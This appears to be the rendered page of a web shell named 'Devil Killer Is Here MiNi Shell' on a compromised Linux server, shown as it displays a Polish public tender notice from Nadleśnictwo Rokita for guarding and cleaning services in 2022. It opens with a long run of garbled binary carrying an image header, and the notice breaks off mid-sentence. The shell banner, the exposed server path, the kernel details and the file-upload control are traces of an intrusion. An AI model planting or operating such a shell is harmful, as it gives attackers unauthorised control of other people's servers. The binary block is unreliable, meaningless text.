JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211126/0028685001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi z zakresu dozorowania i prac porządkowych przy biurowcu i posesji Nadleśnictwa Rokita w roku 2022 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Nadleśnictwo Rokita</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 810539261</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rokita 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Przybiernów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">72-110</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL428 - Szczeciński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48914186581</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">rokita@szczecin.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://rokita.szczecin.lasy.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka Leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi z zakresu dozorowania i prac porządkowych przy biurowcu i posesji Nadleśnictwa Rokita w roku 2022 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f798c48f-4eaf-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00286850</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00062943/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługi z zakresu dozorowania i prac porządkowych przy biurowcu i posesji Nadleśnictwa Rokita w roku 2022</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/nadlesnictworokita <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu<br/>Platformy SmartPZP - https://portal.smartpzp.pl/nadlesnictworokita (dalej –<br/>„Platforma”). Wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje,<br/>przekazywane są w zakładce „Korespondencja”. Szczegółowo opisane w SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu<br/>Platformy SmartPZP - https://portal.smartpzp.pl/nadlesnictworokita (dalej –<br/>„Platforma”). Sposób sporządzenia i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej musi być<br/>zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z<br/>dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania<br/>informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452). Za datę wpływu oświadczeń, ofert, wniosków, zaświadczeń oraz informacji<br/>przyjmuje się datę ich przekazania do Platformy. Aktualny data i godzina,<br/>zsynchronizowane z Głównym Urzędem Miar, wyświetlane są w prawym górnym<br/>rogu Platformy. W celu skorzystania z Platformy konieczna jest rejestracja Wykonawcy pod<br/>adresem: https://portal.smartpzp.pl/nadlesnictworokita po kliknięciu na przycisk<br/>„Załóż konto”. Wykonawca rejestrując się akceptuje warunki korzystania<br/>z Platformy, określone w Regulaminie podczas rejestracji oraz uznaje go za<br/>wiążący. Korzystanie z Platformy jest bezpłatne. Podgląd i pobieranie dokumentacji<br/>postępowania nie wymaga logowania. Zamawiający, informuje, że Platforma jest kompatybilna ze wszystkimi podpisami<br/>elektronicznymi. Do przesłania dokumentów i złożenia oferty nie jest niezbędne<br/>posiadanie certyfikatu kwalifikowanego. Szczegółowe informacje o sposobie<br/>pozyskania usługi kwalifikowanego podpisu elektronicznego oraz warunkach jej<br/>użycia można znaleźć na stronach internetowych kwalifikowanych dostawców<br/>usług zaufania, których lista znajduje się pod adresem internetowym:<br/>http://www.nccert.pl/kontakt.htm. Zamawiający określa niezbędne wymagania techniczne umożliwiające pracę na<br/>platformie Portalu e-Usług SMARTPZP tj.<br/>a. Stały dostęp do sieci Internet o gwarantowanej przepustowości nie<br/>mniejszej niż 1 Mb/s; b. Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 3 GB RAM, procesor 1500 MHz lub lepszy, jeden z systemów operacyjnych Linux Kernel 4.0, Windows 7 i MacOS 10.12 - lub ich nowsze wersje,<br/>c. Przeglądarki internetowe:<br/>- Mozzilla Firefox ver. 65 i późniejsze, Google Chrome ver.66 i późniejsze lub Opera ver. 58 i późniejsze, Microsoft Edge ver. 18 i późniejsze, Internet Explorer 11.<br/>- lista zalecanych przeglądarek internetowych: Google Chrome, Mozilla Firefox, Opera. Zalecane jest używanie najnowszych wersji przeglądarek.<br/>d. Dodatkowe oprogramowanie: - zainstalowane środowisko Java w wersji min. 1.8 (jre), - w przypadku przeglądarek Opera, Chrome i Firefox należy<br/>doinstalować dodatek do przeglądarki Szafir SDK Web, - oprogramowania SzafirHost w systemie operacyjnym. Pozostałe wymagania techniczne i organizacyjne wysyłania i odbierania<br/>dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz<br/>informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z Platformy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu<br/>takich danych oraz uchylenia dyrektywy 95/46/WE Zamawiający informuje, iż administratorem danych osobowych jest Nadleśniczy Nadleśnictwa Rokita, Rokita 2, 72-110 Przybiernów. Administrator<br/>wyznaczył Inspektora Ochrony Danych Osobowych p. Karolina Kaczmarek, z którym w sprawach dotyczących przetwarzania danych osobowych można skontaktować pocztą elektroniczną pod adresem rodo@szczecin.lasy.gov.pl. lub telefonicznie pod numerem +48 91 432 87 12 . Zamawiający przetwarza dane osobowe zebrane w postępowaniu o udzielenie zamówienia publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem. Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale VI PZP, do upływu terminu do ich wniesienia. Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być dopuszczone wyłącznie osoby posiadające upoważnienie. Osoby dopuszczone<br/>do przetwarzania takich danych są obowiązane do zachowania ich w poufności. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem niniejszego postępowania o udzielenie zamówienia<br/>publicznego oraz jego rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki określone w art. 255-256 PZP – w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji. Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania zostanie udostępniona w oparciu o przepisy PZP, a także na podstawie ustawy o dostępie do informacji publicznej. Dane osobowe pozyskane w związku z prowadzeniem postępowania o udzielenie zamówienia mogą zostać przekazane podmiotom świadczącym usługi doradcze, w tym usługi prawne, i konsultingowe. Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie będą podejmowane w sposób zautomatyzowany. Osoba, której dotyczą pozyskane w związku z prowadzeniem niniejszego postępowania dane osobowe, ma prawo: 1) dostępu do swoich danych osobowych – zgodnie z art. 15 RODO, przy czym w sytuacji, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1 -3 RODO wymagałoby niewspółmiernie dużego wysiłku Zamawiający może żądać wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty bieżącego bądź zakończonego postępowania o udzielenie zamówienia publicznego; do sprostowana swoich danych osobowych – zgodnie z art. 16 RODO, przy czym skorzystanie z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego, ani zmianą postanowień umowy w zakresie niezgodnym z PZP oraz nie może naruszać integralności protokołu oraz jego załączników; do żądania od Zamawiającego – jako administratora, ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego UE lub państwa członkowskiego; prawo to nie ogranicza przetwarzania danych osobowych<br/>do czasu zakończenia postępowania o udzielenie zamówienia publicznego; wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych<br/>w przypadku uznania, iż przetwarzanie jej danych osobowych narusza przepisy o ochronie danych osobowych, w tym przepisy RODO. Obowiązek informacyjny RODO został szczegółowo opisany w SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.6.4.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 150000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie usług z zakresu dozorowania i prac porządkowych przy biurowcu i posesji Nadleśnictwa Rokita, Rokita 2, 72-110 Przybiernów. Usługi dozoru budynku biurowca Nadleśnictwa Rokita z punktem alarmowo-prognostycznym ochrony przeciwpożarowej i mieszkaniem oraz przyległej posesji o pow. 2,52 ha wraz z budynkiem warsztatu, garażami, magazynem sprzętu szkółkarskiego, nasion, szyszek, sprzętu przeciwpożarowego, innymi magazynami<br/>i budynkami gospodarczymi oraz budynku mieszkalnego oraz prace porządkowe.<br/>Szczegółowy Opis Przedmiotu Zamówienia stanowi dokumentacja: Opis przedmiotu zamówienia - Usługi z zakresu dozorowania i prac porządkowych przy biurowcu i posesji Nadleśnictwa Rokita w roku 2022 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">98341140-8 - Usługi dozorowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79711000-1 - Usługi nadzoru przy użyciu alarmu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert: punktowo<br/>Przy wyborze ofert Zamawiający będzie się kierował następującymi kryteriami<br/>oceny ofert:<br/>1) Cena – 60 %<br/>2) Samodzielna realizacja kluczowych zadań zamówienia (T) – 40 %<br/>Maksymalna liczba punktów w kryteriach równa jest określonej wadze dla<br/>tych kryteriów w %.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Samodzielna realizacja kluczowych zadań zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu<br/>do warunku zdolności do występowania w obrocie gospodarczym<br/>uprawnień do prowadzenia określonej działalności gospodarczej<br/>lub zawodowej.<br/>2)W odniesieniu do posiadanych uprawnień do prowadzenia określonej<br/>działalności gospodarczej lub zawodowej, Wykonawca musi wykazać, że<br/>posiada ważną koncesję wydaną przez Ministra Spraw Wewnętrznych i<br/>Administracji na prowadzenie działalności gospodarczej w zakresie ochrony<br/>osób i mienia na obszarze, na którym będzie wykonywane zamówienie<br/>zgodnie z art. 15 ust. 1 ustawy z dnia 22 sierpnia 1997 r. o ochronie osób i<br/>mienia (Dz.U. z 2021 r. poz. 1995 z późniejszymi zmianami).<br/>3) sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu<br/>spełniania warunku udziału w postępowaniu w odniesieniu do warunków<br/>dot. zdolności ekonomicznej.<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu<br/>spełniania warunku udziału w postępowaniu w odniesieniu do warunków<br/>dot. sytuacji finansowej.<br/>4) zdolności technicznej lub zawodowej<br/>Warunek w odniesieniu do potencjału technicznego zostanie spełniony,<br/>jeśli, Wykonawca wykaże, że dysponuje:<br/>- własną stacją monitorowania działającą całodobowo i rejestrującą<br/>sygnały z obiektu (podłączenie dwutorowe do własnej stacji).<br/>Zamawiający nie formułuje warunku udziału w postępowaniu w odniesieniu<br/>do doświadczenia Wykonawcy.<br/>Warunek w odniesieniu do osób skierowanych przez Wykonawcę do<br/>realizacji zamówienia zostanie spełniony jeśli, Wykonawca wykaże, że<br/>dysponuje:<br/>- co najmniej dwoma dwuosobowymi grupami interwencyjnymi (SUFO)<br/>zdolnymi do reakcji tj. dotarcia do obiektów Zamawiającego w ciągu 40 min<br/>od chwili powiadomienia (zgodnie z Rozporządzeniem Ministra Spraw<br/>Wewnętrznych i Administracji z dnia 21 października 2011 r., w sprawie<br/>zasad uzbrojenia specjalistycznych uzbrojonych formacji ochronnych<br/>i warunków przechowywania oraz ewidencjonowania broni i amunicji (Dz.U.<br/>z 2015, poz. 992) działającymi całodobowo;<br/>- co najmniej trzema osobami (pracownikami dozoru) a każda z nich<br/>posiada co najmniej trzymiesięczne doświadczenie w realizacji usług<br/>z zakresu dozorowania. Przez pojęcie doświadczenia w realizacji usług<br/>z zakresu dozorowania rozumie się umiejętności zdobyte<br/>i ugruntowane w trakcie faktycznego ich wykonywania, w różnych formach<br/>prawnych (np. umowa o pracę, umowa o dzieło, umowa zlecenie, praktyka), <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia, <br/>Zamawiający przed udzieleniem zamówienia, działając na podstawie art. 274 ust. 1<br/>PZP wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących podmiotowych środków dowodowych: a) informacji z Krajowego Rejestru Karnego w zakresie:(a) art. 108 ust. 1 pkt 1 i 2 PZP,(b) art. 108 ust. 1 pkt 4 PZP, dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego – wystawionej nie wcześniej niż 6 miesięcy przed jej złożeniem, b) oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, z innym Wykonawcą, który złożył<br/>odrębną ofertę lub ofertę częściową, albo oświadczenie o przynależności do<br/>tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty lub oferty częściowej niezależnie od<br/>innego Wykonawcy należącego do tej samej grupy kapitałowej (załącznik nr 6 do SWZ),<br/>c) zaświadczenia właściwego naczelnika urzędu skarbowego<br/>potwierdzające, że Wykonawca nie zalega z opłacaniem podatków i<br/>opłat, w zakresie art. 109 ust. 1 pkt 1) PZP, wystawionego nie wcześniej<br/>niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z<br/>opłaceniem podatków lub opłat wraz z zaświadczeniem, Zamawiający żąda<br/>złożenia dokumentów potwierdzających, że przed upływem terminu<br/>składania ofert Wykonawca dokonał płatności należnych podatków lub opłat<br/>wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w<br/>sprawie spłat tych należności,<br/>d) zaświadczenia albo innego dokumentu właściwej terenowej jednostki<br/>organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego<br/>oddziału regionalnego lub właściwej placówki terenowej Kasy<br/>Rolniczego Ubezpieczenia Społecznego potwierdzającego,<br/>że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia<br/>społeczne lub zdrowotne, w zakresie art. 109 ust. 1 pkt 1 PZP,<br/>wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w<br/>przypadku zalegania z opłaceniem składek na ubezpieczenie społeczne lub<br/>zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający<br/>żąda złożenia dokumentów potwierdzających, że przed upływem terminu<br/>składania ofert Wykonawca dokonał płatności należnych składek na<br/>ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami<br/>lub zawarł wiążące porozumienie w sprawie spłat tych należności,<br/>e) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109<br/>ust. 1 pkt 4) PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej<br/>złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji,<br/>f) oświadczenia wykonawcy o aktualności informacji zawartych<br/>w oświadczeniu, o którym mowa w art. 125 ust. 1 PZP (oświadczenie o<br/>braku podstaw do wykluczenia, sporządzone wg załącznika nr 3B do<br/>SWZ), w zakresie podstaw wykluczenia z postępowania określonych w: a)<br/>art. 108 ust. 1 pkt 3 PZP, b) art. 108 ust. 1 pkt 4 PZP dotyczących<br/>orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka<br/>zapobiegawczego, c) art. 108 ust. 1 pkt 5 PZP dotyczących zawarcia z<br/>innymi wykonawcami porozumienia mającego na celu zakłócenie<br/>konkurencji, d) art. 108 ust. 1 pkt 6 PZP, e) art. 109 ust. 1 pkt 1 PZP,<br/>odnośnie naruszenia 